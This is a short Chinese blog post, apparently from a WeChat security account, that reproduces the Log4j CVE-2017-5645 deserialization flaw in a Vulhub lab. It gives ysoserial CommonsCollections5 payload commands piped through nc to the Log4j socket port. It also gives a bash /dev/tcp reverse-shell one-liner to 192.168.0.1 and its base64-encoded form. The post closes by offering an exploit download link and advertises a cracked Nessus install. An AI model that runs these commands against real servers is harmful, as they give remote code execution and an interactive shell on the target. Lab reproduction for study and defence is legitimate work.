本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
进入到vulbub靶场的/vulhub/log4j/CVE-2017-5645目录
使用命令:docker-compose up -d #启动镜像,整个过程比较久,耐心等待
docker-compose exec log4j bash
ls /tmp 查看当前文件情况,用于后续确认远程命令执行是否执行成功
使用ysoserial生成payload,然后直接发送给192.168.0.140:4712
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/success" | nc.exe 192.168.0.140 4712
通过docker命令行可以看到生成了success文件夹
nc.exe -lvvp 9999
将 /bin/bash -i >& /dev/tcp/192.168.0.1/9999 0>&1 进行base64编码
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4xLzk5OTkgMD4mMQ==
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4xLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" | nc.exe 192.168.0.140 471
沉住气,不要急!!!
得到反弹shell,success
关注浪飒sec回复
221108
获取exp下载地址
Ubuntu 20.04 离线安装破解 Nessus 10.3.0